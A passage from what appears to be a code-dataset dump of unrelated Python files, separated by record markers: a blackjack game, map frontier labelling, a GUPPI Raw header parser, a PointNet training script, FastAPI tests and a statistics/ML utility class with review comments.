    if not a.cards:
        print(f"{str(a)} has no cards.")
        return
    print(f"{str(a)} has following cards:")
    for card in a.cards:
        print(card)
    print(a.val)
def askforbet(b):
    """Prompt until ``b`` enters a valid integer bet it can afford, then
    deduct it from the player's funds and record it as the current bet.

    BUG FIX: the original recursed on every invalid entry, which could
    exhaust the stack under repeated bad input; this version loops.  The
    bare ``except:`` is narrowed to ValueError (all int() can raise here).
    """
    while True:
        a = input('Enter your bet amount:')
        try:
            a = int(a)
        except ValueError:
            print('Invalid Input')
            continue
        if a > b.myfunds:
            print(f'Insufficient funds. Your chips:{b.myfunds}')
            continue
        b.myfunds -= a
        b.bet = a
        return
def askforhit():
    """Loop asking the player to HIT or STAY, updating global game state.

    Sets the global ``gc`` ("game concluded") flag when the player busts
    or reaches 21.

    BUG FIX: on invalid input the original recursively re-entered
    askforhit() from *inside* the loop; when the inner call returned, the
    outer loop resumed and prompted again (double-prompting, unbounded
    stack growth).  Invalid input now simply re-iterates the loop.
    """
    global gc
    while True:
        print("=======================================")
        a = input('Choose HIT or STAY: ').lower()
        print("=======================================")
        if a == 'stay':
            print('PLayer stays!')
            break
        elif a == 'hit':
            hit(player1)
            if player1.val > 21:
                player1.bust()
                gc = True
                break
            if player1.val == 21:
                player1.win()
                gc = True
                break
        else:
            print('Not a valid input.')
def hit(x):
    """Deal one random card from the global ``deck1`` to ``x`` and show the hand."""
    print(f"{str(x)} hits!")
    new_card(deck1.randomgroup(),deck1.randomface(),x.cards,x)
    print("=======================================")
    printcards(x)
def tie():
    """Announce a push: return the bet to the player and clear both hands."""
    print('\n')
    print("=======================================")
    print('The Game is Tied :-|')
    print("=======================================")
    # Refund the wager, then reset both hands for the next round.
    player1.myfunds+=player1.bet
    player1.bet=0
    player1.val=0
    player1.cards.clear()
    dealer1.val=0
    dealer1.cards.clear()
def playagain():
    """Ask whether to start another round; loops until input is yes/no.

    BUG FIX: the original recursed on invalid input, growing the stack
    for every bad entry; this version loops instead.
    """
    while True:
        a = input('Play Again?(Yes/No):').lower()
        if a == 'yes':
            play()
            return
        if a == 'no':
            print('OK then. GoodBye')
            print('\n')
            print("=======================================")
            return
        print('Not a valid input.')
def gameover():
    """Settle bust outcomes at the end of a round and clear the
    round-finished flag ``gc``."""
    global gc
    if dealer1.busts:
        player1.win()
    elif player1.busts:
        dealer1.win()
    else:
        print('Good Game!')
    gc=False
def play():
    """Run one interactive round: take a bet, deal, let the player hit,
    then play out the dealer (hits below 17) and settle the result.

    Communicates the round state to gameover()/playagain() through the
    module globals ``gc``, ``player1``, ``dealer1`` and ``deck1``.
    """
    global gc
    print('\n')
    print("=======================================")
    print('Welcome to BlackJack')
    print("=======================================")
    print('\n')
    print("=======================================")
    askforbet(player1)
    print('Your bet has been placed.')
    print("=======================================")
    print('\n')
    # Initial deal: two cards each, dealer's second card face down.
    new_card(deck1.randomgroup(),deck1.randomface(),player1.cards,player1)
    new_card(deck1.randomgroup(),deck1.randomface(),player1.cards,player1)
    new_card(deck1.randomgroup(),deck1.randomface(),dealer1.cards,dealer1)
    new_card(deck1.randomgroup(),deck1.randomface(),dealer1.cards,dealer1)
    dealer1.hidecard()
    print('\n')
    print("=======================================")
    printcards(dealer1)
    printcards(player1)
    print("=======================================")
    print('\n')
    if player1.val == 21:
        player1.blackjack()
        gc=True
    # NOTE(review): askforhit() runs even when the blackjack branch above
    # already concluded the round (gc=True) - confirm this is intended.
    askforhit()
    if not gc:
        print('\n')
        print("=======================================")
        dealer1.revealcard()
        print('Dealer\'s card is revealed')
        printcards(dealer1)
        print("=======================================")
        print('\n')
        # Dealer must hit until reaching at least 17.
        while dealer1.val<17 :
            y=input('Press ENTER to continue.')
            print('\n')
            print("=======================================")
            hit(dealer1)
            if dealer1.val>21:
                dealer1.bust()
                gc=True
                break
            if dealer1.val==21:
                dealer1.win()
                gc=True
                break
        if not gc:
            y=input('Press ENTER to continue.')
            # Showdown: compare hand values.
            if dealer1.val==player1.val:
                tie()
            elif dealer1.val>player1.val:
                print("=======================================")
                print('Dealer has a higher hand.')
                print("=======================================")
                dealer1.win()
                player1.lose()
                print("=======================================")
            else:
                print("=======================================")
                print('You have a higher hand.')
                print("=======================================")
                player1.win()
                dealer1.lose()
                print("=======================================")
# Entry point: play one round, settle any bust, then offer replays.
play()
gameover()
playagain()
| StarcoderdataPython |
1630208 | import numpy as np
def DeterPoint(map, row, column):
    """Return True if any cell in the 3x3 neighbourhood of (row, column)
    holds -1 (unknown space), i.e. the cell borders unexplored map."""
    neighbourhood = (
        map[r][c]
        for r in (row - 1, row, row + 1)
        for c in (column - 1, column, column + 1)
    )
    return any(value == -1 for value in neighbourhood)
def FBE(map, row, column, mark):
    """Frontier-based flood fill: starting from the neighbours of
    (row, column), label every connected free cell (0) that borders
    unknown space (-1) with ``mark``.  Mutates and returns ``map``."""
    for r in (row - 1, row, row + 1):
        for c in (column - 1, column, column + 1):
            if map[r][c] == 0 and DeterPoint(map, r, c):
                map[r][c] = mark
                map = FBE(map, r, c, mark)
    return map
# Build a random occupancy grid: values in {-1 unknown, 0 free, 1 occupied},
# then label each connected frontier region with its own negative mark
# (starting at -2 and decreasing).
mark = -2
frontier_localmap = np.random.randint(0, 3, (800, 800)) - 1
# Force a 10-cell occupied border so neighbourhood lookups never wrap.
frontier_localmap[0:10, :] = 1
frontier_localmap[-11:-1, :] = 1
frontier_localmap[:, 0:10] = 1
frontier_localmap[:, -11:-1] = 1
for row in range(len(frontier_localmap)-1):
    for column in range(len(frontier_localmap[0])-1):
        if frontier_localmap[row][column] == 0 and DeterPoint(frontier_localmap, row, column):
            frontier_localmap[row][column] = mark
            # NOTE(review): FBE recurses per frontier cell; very large
            # connected frontiers may hit Python's recursion limit - confirm.
            frontier_localmap = FBE(frontier_localmap, row, column, mark)
            mark -= 1
print(frontier_localmap)
11296477 | <reponame>EngineeringSoftware/hdlp
# This script copies assignment prediction model test results into
# _results/test-results/{model_name}.json.
from typing import *
import argparse
import os
import glob
TESTDIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), "tests")
RESULT_DIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), "../slpproject/_results")
DST_DIR = os.path.join(RESULT_DIR, "test-results")
parser = argparse.ArgumentParser()
parser.add_argument('-which', '--which', required=True,
default=[],
type=str, nargs='+', help='model list used for copying result files.')
parser.add_argument('-suffix', '--suffix', required=True,
default='',
type=str, help='suffix for the results to be used in files/macros')
def check_models(args):
    """Verify that every requested model has at least one testlog file.

    NOTE(review): ``assert`` is stripped under ``python -O``; raising an
    exception would be more robust for input validation.
    """
    for m in args.which:
        result_files = glob.glob(os.path.join(TESTDIR, m, "testlog.*.log"))
        assert len(result_files)>=1, f"Can't find result files for model {m}"
    return
def copy_results(args, model, mode):
    """Copy one model's assignments log into DST_DIR/<model><suffix>.json.

    ``mode`` selects the split: "val" copies the validation log, anything
    else copies the test log.  Exactly one matching log file must exist.
    """
    from shutil import copyfile
    if not os.path.exists(DST_DIR):
        os.mkdir(DST_DIR)
    src = glob.glob(os.path.join(TESTDIR, model, "testlog.assignments.*.log"))
    if mode == "val":
        src = glob.glob(os.path.join(TESTDIR, model, "testlog.val.assignments.*.log"))
    assert len(src) == 1
    suffix = args.suffix
    dst = os.path.join(DST_DIR, f"{model}{suffix}.json")
    copyfile(src[0], dst)
    return
def copy_model_results(args):
    """Copy the test-split results for every model requested on the CLI."""
    for m in args.which:
        copy_results(args, m, "test")
    return
def main():
    """CLI entry point: validate the requested models, then copy their logs."""
    args = parser.parse_args()
    check_models(args)
    copy_model_results(args)
    return
# Script entry point.
if __name__=="__main__":
    main()
| StarcoderdataPython |
11279185 | <reponame>MilesCranmer/bifrost<filename>python/bifrost/guppi_raw.py
# Copyright (c) 2016, The Bifrost Authors. All rights reserved.
# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of The Bifrost Authors nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
GUPPI Raw format
Headers:
Records are 80 chars, padded with spaces
Keywords are truncated/padded with spaces to 8 chars
"keyword1= <value>"
String values are enclosed in single-quotes
Numerical values typically not enclosed in quotes, but sometimes may be
Final record is always 'END' + ' '*77
Header keywords:
DIRECTIO: If present and non-zero, headers are padded to a 512-byte boundary
NBITS: No. bits per real component (e.g., 4 => 4+4-bit complex values); typical values: 8,4,2 (particularly 8)
BLOCSIZE: No. bytes per binary data block
OBSNCHAN (or NCHAN?)
NPOL: Single-pol if 1 else dual-pol
OBSFREQ: Centre freq of data
OBSBW: Bandwidth of data (may be negative to indicate high->low channel ordering)
BACKEND: 'GUPPI' for guppi/BL data
[CHAN_BW]
NTIME = BLOCSIZE * 8 / (2 * NPOL * NCHAN * NBITS)
Binary data:
[chan][time][pol][complex]
"""
import numpy as np
def read_header(f):
    """Parse a GUPPI Raw header from file-like object ``f``.

    Reads 80-character records up to the 'END' record and returns a dict
    of keyword -> value (int, float, or unquoted/rstripped string).
    NPOL is normalised to 1 or 2, NTIME is derived when absent, and
    DIRECTIO padding is consumed so the caller is positioned at the
    start of the binary data block.

    Raises:
        IOError: on EOF in the middle of the header.
        KeyError: on a duplicated header keyword.
        ValueError: on a value that is neither numeric nor quoted.
    """
    RECORD_LEN = 80
    DIRECTIO_ALIGN_NBYTE = 512
    hdr = {}
    while True:
        record = f.read(RECORD_LEN)
        if len(record) < RECORD_LEN:
            raise IOError("EOF reached in middle of header")
        if record.startswith('END'):
            break
        key, val = record.split('=', 1)
        key, val = key.strip(), val.strip()
        if key in hdr:
            raise KeyError("Duplicate header key:", key)
        try: val = int(val)
        except ValueError:
            try: val = float(val)
            except ValueError:
                if val[0] not in set(["'", '"']):
                    raise ValueError("Invalid header value:", val)
                val = val[1:-1]    # Remove quotes
                val = val.rstrip() # Remove padding within string
        hdr[key] = val
    # BUG FIX: the format spec (module docstring) says padding applies when
    # DIRECTIO is present AND non-zero; the original only tested presence.
    if hdr.get('DIRECTIO', 0):
        # Advance to the 512-byte alignment boundary.
        # Note: we avoid seek() so that Unix pipes keep working.
        # BUG FIX: use (-tell) % align so an already-aligned position skips
        # 0 bytes (the original skipped a full 512-byte block in that case).
        f.read(-f.tell() % DIRECTIO_ALIGN_NBYTE)
    if 'NPOL' in hdr:
        # WAR for files with NPOL=4, which includes the complex components
        hdr['NPOL'] = 1 if hdr['NPOL'] == 1 else 2
    if 'NTIME' not in hdr:
        # Compute and add the NTIME parameter.
        # BUG FIX: integer division - NTIME is a sample count; under
        # Python 3 the original '/' produced a float.
        hdr['NTIME'] = hdr['BLOCSIZE'] * 8 // (hdr['OBSNCHAN'] * hdr['NPOL'] *
                                               2 * hdr['NBITS'])
    return hdr
#def read_data(f, hdr):
# assert(hdr['NBITS'] == 8)
# count = hdr['BLOCSIZE']
# shape = (hdr['OBSNCHAN'], hdr['NTIME'], hdr['NPOL'])
# data = np.fromfile(f, dtype=np.int8, count=count)
# data = data.astype(np.float32).view(np.complex64)
# data = data.reshape(shape)
# return data
| StarcoderdataPython |
1854376 | <reponame>ayr-ton/Emberblast<gh_stars>1-10
from project.test.test import BaseTestCase
from project.message import print_player_stats, print_enemy_status
from .test_player import mock_player
from .test_map import mock_map
@mock_player()
@mock_map()
class TestModuleMessage(BaseTestCase):
    """Smoke tests for the message-printing helpers.

    The class decorators attach ``self.mock_player`` (and a mocked map)
    to every test-case instance; each test just checks the helper renders
    without raising.
    """
    def test_print_player_stats(self) -> None:
        # Should print the player's stat sheet without raising.
        print_player_stats(self.mock_player)
    def test_print_enemy_status(self) -> None:
        # Should print the enemy status view without raising.
        print_enemy_status(self.mock_player)
    def test_print_plain_matrix(self) -> None:
        # TODO: not yet implemented.
        pass
| StarcoderdataPython |
# Demo: Python lambda expressions
#
# A lambda is a small anonymous function.  It can take any number of
# arguments but contains exactly one expression, whose value is returned:
#
#     lambda arguments: expression

# Bind a two-argument lambda to a name and call it (prints 30).
x = lambda a, b: a * b
print(x(5, 6))
1906075 | from __future__ import print_function
import argparse
import os
import random
import torch
import torch.nn.parallel
import torch.optim as optim
import torch.utils.data
from pointnet.dataset import ShapeNetDataset, ModelNetDataset
from lightning_solution.model import PointNetCls, feature_transform_regularizer
import torch.nn.functional as F
import pytorch_lightning as pl
from tqdm import tqdm
from pytorch_lightning.loggers import TensorBoardLogger
def train():
    """Train (or load) a PointNet classifier with PyTorch Lightning.

    Parses CLI arguments, builds ShapeNet or ModelNet40 data loaders,
    then either fits a new PointNetCls for --nepoch epochs or loads a
    checkpoint from --pretrain, and finally evaluates on the test split.
    """
    from utils.show3d_balls import showpoints
    parser = argparse.ArgumentParser()
    parser.add_argument(
        '--batchSize', type=int, default=32, help='input batch size')
    parser.add_argument(
        '--num_points', type=int, default=2, help='input batch size')
    parser.add_argument(
        '--workers', type=int, help='number of data loading workers', default=4)
    parser.add_argument(
        '--nepoch', type=int, default=250, help='number of epochs to train for')
    parser.add_argument('--outf', type=str, default='cls', help='output folder') ##TODO see if we want to include it
    parser.add_argument('--model', type=str, default='', help='model path') ##TODO see if we want to include it
    parser.add_argument('--dataset', type=str, required=True, help="dataset path")
    parser.add_argument('--dataset_type', type=str, default='shapenet', help="dataset type shapenet|modelnet40")
    parser.add_argument('--feature_transform', action='store_true', help="use feature transform")
    parser.add_argument(
        '--show', type=int, default=0, help="show 3d models every <> inputs")
    parser.add_argument(
        '--pretrain', type=str, default='', help="pretrained dir to laod model from (skip training)")
    opt = parser.parse_args()
    print(opt)
    # NOTE(review): ``blue`` (ANSI colouring helper) is defined but unused here.
    blue = lambda x: '\033[94m' + x + '\033[0m'
    opt.manualSeed = random.randint(1, 10000)  # fix seed
    print("Random Seed: ", opt.manualSeed)
    random.seed(opt.manualSeed)
    torch.manual_seed(opt.manualSeed)
    if opt.dataset_type == 'shapenet':
        dataset = ShapeNetDataset(
            root=opt.dataset,
            classification=True,
            npoints=opt.num_points)
        test_dataset = ShapeNetDataset(
            root=opt.dataset,
            classification=True,
            split='test',
            npoints=opt.num_points,
            data_augmentation=False)
    elif opt.dataset_type == 'modelnet40':
        dataset = ModelNetDataset(
            root=opt.dataset,
            npoints=opt.num_points,
            split='trainval')
        test_dataset = ModelNetDataset(
            root=opt.dataset,
            split='test',
            npoints=opt.num_points,
            data_augmentation=False)
    else:
        exit('wrong dataset type')
    dataloader = torch.utils.data.DataLoader(
        dataset,
        batch_size=opt.batchSize,
        shuffle=True,
        num_workers=int(opt.workers))
    testdataloader = torch.utils.data.DataLoader(
        test_dataset,
        batch_size=opt.batchSize,
        shuffle=True,
        num_workers=int(opt.workers))
    print(len(dataset), len(test_dataset))
    num_classes = len(dataset.classes)
    print('classes', num_classes)
    try:
        os.makedirs(opt.outf)
    except OSError:
        pass
    logger = TensorBoardLogger('tb_logs', name='ClsModel')
    # Only pass a point-cloud visualiser when --show was requested.
    show_func = showpoints if opt.show !=0 else None
    trainer = pl.Trainer(gpus=1,logger=logger, max_epochs= opt.nepoch)
    if opt.pretrain == "":
        print("training new model")
        # NOTE(review): feature_transform is passed the *regularizer
        # function* rather than the --feature_transform flag - confirm
        # against PointNetCls's expected argument.
        model = PointNetCls(k=num_classes,feature_transform=feature_transform_regularizer,show_points_func=show_func)
        trainer.fit(model,dataloader)
    elif os.path.exists(opt.pretrain):
        print("loading existing model from ",opt.pretrain)
        model = PointNetCls.load_from_checkpoint(opt.pretrain)
        # Fresh trainer without the TensorBoard logger for evaluation only.
        trainer = pl.Trainer(gpus=1 )
    else:
        print("ERROR!")
        return
    trainer.test(model,test_dataloaders=testdataloader)
# Script entry point.
if __name__ == "__main__":
    train()
5056798 | <gh_stars>0
from fastapi.testclient import TestClient
from main import app
client = TestClient(app)
def test_read_surveys():
    # The root endpoint should respond 200.
    response = client.get("/")
    assert response.status_code == 200
def test_read_sightings():
    # Listing sightings should respond 200.
    response = client.get("/sightings")
    assert response.status_code == 200
def test_read_sightings_id():
    # An unknown sighting id should yield a 404 with the expected detail.
    response = client.get("/sightings/1")
    assert response.status_code == 404
    assert response.json () == {"detail" : "sighting not found"}
5159748 | <filename>Python_Brain/Python_Brain.py
import numpy as np
from matplotlib import pyplot as plt
import pandas as pd
import sys
class Csv_File:
    """Thin wrapper around a pandas DataFrame with row/column helpers.

    NOTE(review): on errors the I/O and accessor methods print a message
    and call exit(...), terminating the process - confirm this is the
    desired behaviour for library use.
    """
    # Annotation fix: annotate with the type, not an instance expression.
    Data: pd.DataFrame
    number_of_rows: int
    number_of_columns: int
    def __init__(self):
        self.Data = pd.DataFrame()
        self.number_of_rows = 0
        self.number_of_columns = 0
    def __str__(self):
        # Prints the frame as a side effect and returns an empty string.
        print(self.Data)
        return ""
    def load_csv(self, Path: str):
        """Load a CSV file into self.Data and refresh the row/column counts."""
        try:
            self.Data = pd.read_csv(Path)
            self.number_of_columns = len(self.Data.columns)
            self.number_of_rows = len(self.Data)
        except:
            print("There Was An Error In File Loading ,Check File Path/Name\n Process Terminated")
            exit(12)
    def write_csv(self, Filename: str):
        """Write self.Data to ``Filename`` without the index column."""
        try:
            self.Data = self.Data[:]
            self.Data.to_csv(Filename, index=False)
        except:
            print("There Was An Error In File Writing ,Check File Path/Name\n Process Terminated")
            exit(12)
    def get(self, Row: int, Column: str):
        """Return the scalar at (Row, Column)."""
        try:
            return self.Data[Column].values.item(Row)
        except:
            print("There Was An Error In Fetching Value,Check Row/Column Numbers")
            exit(12)
    def get_row(self, Row: int):
        """Return row ``Row`` as a plain list, in column order."""
        try:
            row = []
            for i in self.Data.columns:
                row.append(self.get(Row, i))
            return row
        except:
            print("Error In Row Number")
            exit(12)
    def add_row(self, values: list):
        """Append ``values`` (one entry per existing column) as a new row."""
        if len(self.Data.columns) < len(values):
            print("There Are More Values In Sample Then Columns In File")
            exit(10)
        else:
            row = {}
            for i in range(0, len(self.Data.columns)):
                row[self.Data.columns[i]] = values[i]
            # NOTE(review): DataFrame.append is deprecated/removed in newer
            # pandas; pd.concat would be the modern equivalent - confirm
            # the pinned pandas version.
            self.Data = self.Data.append(row, ignore_index=True)
            self.number_of_rows += 1
    def get_column_values(self, column_name: str):
        """Return the column's values as a numpy array."""
        return self.Data[column_name].values
    def add_column(self, column_name: str, values):
        """Add (or overwrite) a column and bump the column count."""
        self.Data[column_name] = values
        self.number_of_columns += 1
    def set(self, Row: int, Column: str, val):
        """Set the scalar at (Row, Column) in place."""
        try:
            self.Data[Column].values.itemset(Row, val)
        except:
            print("There Was An Error In Setting Value,Check Row/Column Numbers")
            exit(12)
    def remove_row(self, rows_to_drop: list):
        """Drop the given row labels and update the row count."""
        self.Data = self.Data.drop(rows_to_drop)
        self.number_of_rows -= len(rows_to_drop)
    def remove_column(self, column: str):
        """Drop a column and update the column count."""
        self.Data = self.Data.drop(columns=column)
        self.number_of_columns -= 1
    def split_data(self, split_percentage: int):
        """Randomly move ``split_percentage`` percent of the rows into a
        new Csv_File and return it; the moved rows are removed from self."""
        if split_percentage > 100 or split_percentage < 0:
            print("Split Precentage Must Be Between (0-100)")
            exit(12)
        else:
            amount_needed = np.round((self.number_of_rows / 100) * split_percentage)
            rng = np.random.default_rng()
            # Sample distinct row indices for the split.
            selected_rows = rng.choice(self.number_of_rows, size=int(amount_needed), replace=False)
            result = Csv_File()
            result.Data = pd.DataFrame()
            for i in self.Data.columns:
                result.add_column(i, [])
            for i in range(0, int(amount_needed)):
                result.add_row(self.get_row(selected_rows[i]))
            self.remove_row(selected_rows)
            self.Data = self.Data.reset_index(drop=True)
            return result
    def replace_pattern_in_column(self, column: str, pattern, replace_width):
        """Replace ``pattern`` with ``replace_width`` throughout the column."""
        self.Data[column] = self.Data[column].replace(pattern, replace_width)
    def number_of_missing(self):
        """Return the total count of missing (NaN) cells in the frame."""
        return self.Data.isnull().sum().sum()
class Brain_Util:
    """Assorted helper utilities shared by the brain code."""

    # BUG FIX: declared without ``self`` but also without @staticmethod, so
    # the original only worked when called on the class, never on an instance.
    @staticmethod
    def twoD_matrix_to_csv(matrix: np.ndarray):
        """Convert a 2-D numpy matrix into a Csv_File with one CSV column
        per matrix column, named "Column 1", "Column 2", ...

        BUG FIX: the original iterated shape[0] (row count) while indexing
        the transposed matrix, which is only correct for square matrices;
        the column count shape[1] is used now.
        """
        shape = matrix.shape
        result = Csv_File()
        matrix = matrix.T
        for i in range(0, shape[1]):
            name = str.format("Column {}", i + 1)
            result.add_column(name, matrix[i])
        return result

    def sigmoid(self, x):
        """Logistic sigmoid 1 / (1 + e^-x); accepts scalars or numpy arrays."""
        return 1.0 / (1.0 + np.exp(-x))
class Python_Brain:
    """A grab-bag of classic statistics / ML routines over a Csv_File.

    Pure-array methods (correlations, errors, ranking) take numpy arrays
    directly; the data-set methods read from ``self.Data_Set`` which must
    be attached with load_data_set() first.
    """
    # Quoted forward reference so the class imports even when Csv_File is
    # defined later / elsewhere in the module.
    Data_Set: "Csv_File"

    def load_data_set(self, data_set: "Csv_File"):
        """Attach the Csv_File that subsequent computations read from."""
        self.Data_Set = data_set

    def pearson_correlation_coefficient(self, Y: np.ndarray, Y_HAT: np.ndarray):
        """Pearson's r between two equally sized 1-D arrays."""
        sigma_xy = (Y * Y_HAT).sum()
        sigma_x = Y.sum()
        sigma_y = Y_HAT.sum()
        sigma_xs = (Y * Y).sum()
        sigma_ys = (Y_HAT * Y_HAT).sum()
        # BUG FIX: the original used len(y) - the lowercase module-level
        # global from the demo script - instead of the argument Y.
        r = len(Y) * sigma_xy - sigma_x * sigma_y
        temp = len(Y) * sigma_xs - sigma_x * sigma_x
        temp *= len(Y) * sigma_ys - sigma_y * sigma_y
        r /= np.sqrt(temp)
        return r

    def rankify(self, array: np.ndarray):
        """Fractional 1-based ranks of ``array``; ties share the average rank."""
        ranks = np.zeros((len(array)), dtype=float)
        for i in range(0, len(ranks)):
            r, s = 1, 1
            for j in range(0, len(array)):
                if j == i:
                    continue
                if array.item(j) < array.item(i):
                    r += 1
                if array.item(j) == array.item(i):
                    s += 1
            ranks[i] = r + (s - 1) * 0.5
        return ranks

    def spearman_correlation_coefficient(self, Y: np.ndarray, Y_HAT: np.ndarray):
        """Spearman's rho: Pearson correlation of the fractional ranks."""
        rankY = self.rankify(Y)
        rankYhat = self.rankify(Y_HAT)
        sum_X = rankY.sum()
        sum_Y = rankYhat.sum()
        sum_XY = (rankY * rankYhat).sum()
        squareSum_X = (rankY * rankY).sum()
        squareSum_Y = (rankYhat * rankYhat).sum()
        SCC = (len(Y) * sum_XY - sum_X * sum_Y) / np.sqrt(
            (len(Y) * squareSum_X - sum_X * sum_X) * (len(Y) * squareSum_Y - sum_Y * sum_Y))
        return SCC

    def compute_column_correlations(self, correlation_type):
        """Correlation matrix of the data set's columns
        ('pearson', 'kendall' or 'spearman')."""
        return self.Data_Set.Data.corr(method=correlation_type)

    def linear_regression_static_formula(self, column_a: str, column_b: str):
        """Closed-form simple linear regression of column_b on column_a.

        Returns [intercept, slope] as a numpy array.
        """
        sum_x = self.Data_Set.Data[column_a].values.sum()
        sum_y = self.Data_Set.Data[column_b].values.sum()
        sum_xy = (self.Data_Set.Data[column_a].values * self.Data_Set.Data[column_b].values).sum()
        sum_xsquared = (self.Data_Set.Data[column_a].values * self.Data_Set.Data[column_a].values).sum()
        result = np.zeros(2)
        result[0] = (sum_y * sum_xsquared - sum_x * sum_xy) / (
                self.Data_Set.number_of_rows * sum_xsquared - sum_x * sum_x)
        result[1] = (self.Data_Set.number_of_rows * sum_xy - sum_x * sum_y) / (
                self.Data_Set.number_of_rows * sum_xsquared - sum_x * sum_x)
        return result

    def k_means(self, features: list, k: int, number_of_iterations: int):
        """Naive Lloyd's k-means over column arrays.

        Args:
            features: list of 1-D numpy arrays (one per feature, equal length).
            k: number of clusters.
            number_of_iterations: fixed number of iterations to run.

        Returns:
            (k, n_features) array of cluster centroids.
        """
        n_features = len(features)
        n_points = len(features[0])
        means = np.zeros((k, n_features))
        # Initialise each centroid from randomly chosen coordinate values.
        for cluster in range(0, k):
            means[cluster] = [features[i].item(np.random.randint(0, len(features[i])))
                              for i in range(0, n_features)]
        assignments = np.zeros(n_points)
        for _ in range(0, number_of_iterations):
            # Assignment step: nearest centroid per point.
            for point in range(0, n_points):
                best_distance = sys.float_info.max
                best_cluster = 0
                sample = np.array([features[i].item(point) for i in range(0, n_features)])
                for cluster in range(0, k):
                    # BUG FIX: compare against the centroid row means[cluster];
                    # the original used the scalar means.item(cluster) (flat index).
                    distance = np.linalg.norm(sample - means[cluster])
                    if distance < best_distance:
                        best_distance = distance
                        best_cluster = cluster
                assignments[point] = best_cluster
            # Update step: mean of the points assigned to each cluster.
            new_means = np.zeros((k, n_features))
            counts = np.zeros(k)
            for point in range(0, n_points):
                cluster = int(assignments.item(point))
                # BUG FIX: accumulate per-coordinate sums into the cluster's
                # row; the original mixed flat and row indexing and lost data.
                for fet in range(0, n_features):
                    new_means[cluster, fet] += features[fet].item(point)
                counts[cluster] += 1
            for cluster in range(0, k):
                count = max(1, counts.item(cluster))
                means[cluster] = new_means[cluster] / count
        return means

    def get_mse(self, Y: np.ndarray, Y_HAT: np.ndarray):
        """Mean squared error between Y and Y_HAT."""
        return ((Y - Y_HAT) ** 2).mean()

    def get_mae(self, Y: np.ndarray, Y_HAT: np.ndarray):
        """Mean absolute error between Y and Y_HAT.

        BUG FIX: the original returned the array of absolute differences
        without averaging, unlike get_mse.
        """
        return np.abs(Y - Y_HAT).mean()

    def get_r_squared(self, Y: np.ndarray, Y_HAT: np.ndarray):
        """Coefficient of determination R^2 = (Pearson r)^2."""
        PCC = self.pearson_correlation_coefficient(Y, Y_HAT)
        return PCC * PCC

    def get_adjusted_r_squared(self, Y: np.ndarray, Y_HAT: np.ndarray, Independent_Variables: int):
        """Adjusted R^2 penalising the number of independent variables,
        using the attached data set's row count as the sample size."""
        R_S = self.get_r_squared(Y, Y_HAT)
        ARS = (1 - R_S) * (self.Data_Set.number_of_rows - 1)
        ARS /= self.Data_Set.number_of_rows - 1 - Independent_Variables
        ARS = 1.0 - ARS
        return ARS

    def confusion_matrix(self, regression_weights: np.ndarray, binary_column: str, sampled_rows: list,
                         decision_boundary: float):
        """2x2 confusion matrix [[TP, FN], [FP, TN]] for a linear model
        thresholded at ``decision_boundary``.

        ``regression_weights`` is a column vector with the intercept first,
        then one weight per feature column named in ``sampled_rows``.
        """
        CM = np.zeros((2, 2), dtype=float)
        TruePositive, TrueNegative, FalsePositive, FalseNegative = 0, 0, 0, 0
        for i in range(0, self.Data_Set.number_of_rows):
            pred_s = regression_weights.item((0, 0))
            # BUG FIX: the original wrote range(0, sampled_rows + 1) (a
            # TypeError: list + int) and indexed sampled_rows[-1] at j=0;
            # iterate the feature weights 1..len(sampled_rows).
            for j in range(1, len(sampled_rows) + 1):
                pred_s += regression_weights[j, 0] * self.Data_Set.get(i, sampled_rows[j - 1])
            pred_s = 0 if pred_s < decision_boundary else 1
            actual = self.Data_Set.get(i, binary_column)
            if pred_s == 0 and actual == 0:
                TrueNegative += 1
            elif pred_s == 1 and actual == 0:
                FalsePositive += 1
            elif pred_s == 1 and actual == 1:
                TruePositive += 1
            elif pred_s == 0 and actual == 1:
                FalseNegative += 1
        CM[0, 0] = TruePositive
        CM[1, 0] = FalsePositive
        CM[0, 1] = FalseNegative
        CM[1, 1] = TrueNegative
        return CM

    def KNN(self, K: int, test_values: list, sample_columns: list):
        """Return the K nearest data-set rows to ``test_values`` as a
        (K, 2) array of (row index, Euclidean distance) over ``sample_columns``."""
        distances = np.zeros(self.Data_Set.number_of_rows)
        x = np.zeros(len(sample_columns))
        result = np.zeros((K, 2))
        for i in range(0, self.Data_Set.number_of_rows):
            for j in range(0, len(sample_columns)):
                x[j] = self.Data_Set.get(i, sample_columns[j])
            distances.itemset(i, np.linalg.norm(x - test_values))
        knn = np.zeros(K)
        for i in range(0, K):
            # BUG FIX: the original initialised the running minimum to
            # sys.float_info.min (the smallest *positive* float), so no
            # distance ever beat it; start from +inf instead.
            best = np.inf
            for j in range(0, len(distances)):
                if distances.item(j) < best:
                    best = distances.item(j)
                    knn[i] = j
            result[i, 1] = best
            # BUG FIX: knock out the chosen index itself; the original
            # subtracted 1 and invalidated the wrong entry.
            distances[int(knn[i])] = np.inf
        for i in range(0, K):
            result[i, 0] = knn[i]
        return result

    def step_gradient(self, Current_Weights, Learning_Rate, Columns_Of_Sampels, True_Y):
        """One batch gradient-descent step for linear regression.

